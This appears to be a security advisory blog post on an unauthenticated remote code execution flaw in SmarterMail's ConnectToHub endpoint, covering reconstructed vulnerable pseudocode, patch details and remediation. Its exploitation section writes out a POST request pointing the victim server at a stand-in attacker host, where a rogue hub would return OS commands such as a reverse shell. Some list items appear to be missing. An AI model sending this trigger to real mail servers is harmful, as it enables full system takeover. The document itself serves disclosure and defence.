Jan 28, 2026·5 min read·119 visits
SmarterMail left the 'SystemAdminSettingsController.ConnectToHub' endpoint wide open. An attacker can send a request telling the mail server to connect to a malicious 'Hub' server controlled by the attacker. Upon connection, the malicious server feeds the mail server commands, which are executed with high privileges. It is a text-book unauthenticated RCE rated CVSS 9.3.
A critical authentication bypass in SmarterTools SmarterMail allows unauthenticated attackers to trick the server into executing arbitrary OS commands by abusing the 'ConnectToHub' API.
SmarterMail is the 'Exchange alternative' for people who don't want the headache of managing Microsoft Exchange but still want the headache of managing an enterprise mail server. It's widely used by hosting providers and small-to-medium businesses. Because it handles email, it is effectively the nervous system of an organization, sitting on sensitive data and usually enjoying high privileges on the host OS.
In January 2026, researchers uncovered a flaw that is almost charming in its simplicity. Usually, Remote Code Execution (RCE) requires a complex chain of memory corruption or a Rube Goldberg machine of deserialization gadgets. Not this time.
CVE-2026-24423 is a logic flaw in the High Availability (HA) features of SmarterMail. Specifically, the feature designed to let servers talk to a central management 'Hub' was implemented without checking who was asking to initiate the connection. It's the digital equivalent of a bank vault that opens if you just ask it nicely.
The vulnerability resides in the SystemAdminSettingsController, specifically within a method called ConnectToHub. In a secure application, any controller labeled 'SystemAdmin' should be locked down tighter than a drum, requiring a valid session, an administrative cookie, or an API key.
However, the developers missed the [Authorize] attribute (or its equivalent internal check) on this specific endpoint. This means the API is publicly accessible to anyone who can reach the server's HTTP port.
But the flaw isn't just that the door is unlocked; it's what lies behind the door. The ConnectToHub method takes a URL or IP address as input. Its job is to reach out to that address and establish a management link. The fatal mistake was trusting that the input would point to a legitimate SmarterMail Hub. Instead, it allows an attacker to point the victim server to a malicious rogue server.
While the exact source code is proprietary, we can reconstruct the logic based on the behavior and the patch. The vulnerable controller likely looked something like this pseudocode:
// VULNERABLE CODE PATTERN
public class SystemAdminSettingsController : ApiController
{
// OOPS: Missing [Authorize] or [AdminRequired] attribute here
[HttpPost]
public IActionResult ConnectToHub([FromBody] HubConnectionRequest request)
{
// The server blindly takes the URL from the attacker
var hubUrl = request.HubUrl;
// And initiates a connection to it
var connection = new HubConnection(hubUrl);
connection.Connect(); // Creates the outbound connection
// If the 'Hub' sends back commands during handshake, they get executed
connection.ProcessDirectives();
return Ok();
}
}The fix was brutal and effective: they deleted the code. In Build 9511, the ConnectToHub and ValidateRemoteInstances endpoints were removed or completely refactored to ensure they could not be called without a rigorous authentication context. This is the 'scorched earth' approach to patching, which is often the safest bet.
Exploiting this requires two moving parts: the attacker's client (to send the trigger) and the attacker's server (to emulate a malicious Hub).
Phase 1: The Setup The attacker sets up a simple HTTP server (Python or Go) that mimics the SmarterMail Hub protocol. This doesn't need to be a full implementation; it just needs to respond to the initial handshake with a payload.
Phase 2: The Trigger The attacker sends a POST request to the victim:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: mail.victim-corp.com
Content-Type: application/json
{
"url": "http://attacker-ip:1337/evil-hub"
}Phase 3: The Execution
The victim server receives the request and, obeying the logic, initiates an HTTP connection to http://attacker-ip:1337/evil-hub. The attacker's server accepts the connection and responds with a configuration packet containing OS commands (e.g., spawning a reverse shell or adding a user).
Because the SmarterMail service typically runs as SYSTEM on Windows to manage network ports and files, the resulting shell is fully privileged.
This is a CVSS 9.3 for a reason. It is Unauthenticated (anyone on the internet can do it), Low Complexity (the exploit is just a web request), and High Impact (Complete System Compromise).
Once the attacker has RCE, the game is over. They can:
Since mail servers are often trusted by other internal systems (allow-listed in firewalls), they make excellent jump boxes.
SmarterTools addressed this in Build 9511 (released Jan 15, 2026). If you are running an older version, you are vulnerable.
Remediation Steps:
ConnectToHub originating from unknown IPs prior to patching. This indicates you may have already been compromised.Strategic Mitigation:
Even after patching, ask yourself: Why is my administrative interface exposed to the entire internet? Use firewall rules or IIS restrictions to limit access to /api/v1/settings/sysadmin endpoints to known internal management IPs/VPNs only.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Product | Affected Versions | Fixed Version |
|---|---|---|
SmarterMail SmarterTools | < 100.0.9511 | Build 9511 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-306 (Missing Authentication for Critical Function) |
| Attack Vector | Network (AV:N) |
| CVSS v4.0 | 9.3 (Critical) |
| Privileges Required | None (PR:N) |
| Impact | Remote Code Execution (System) |
| Exploit Status | Active Research / High Risk |
The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.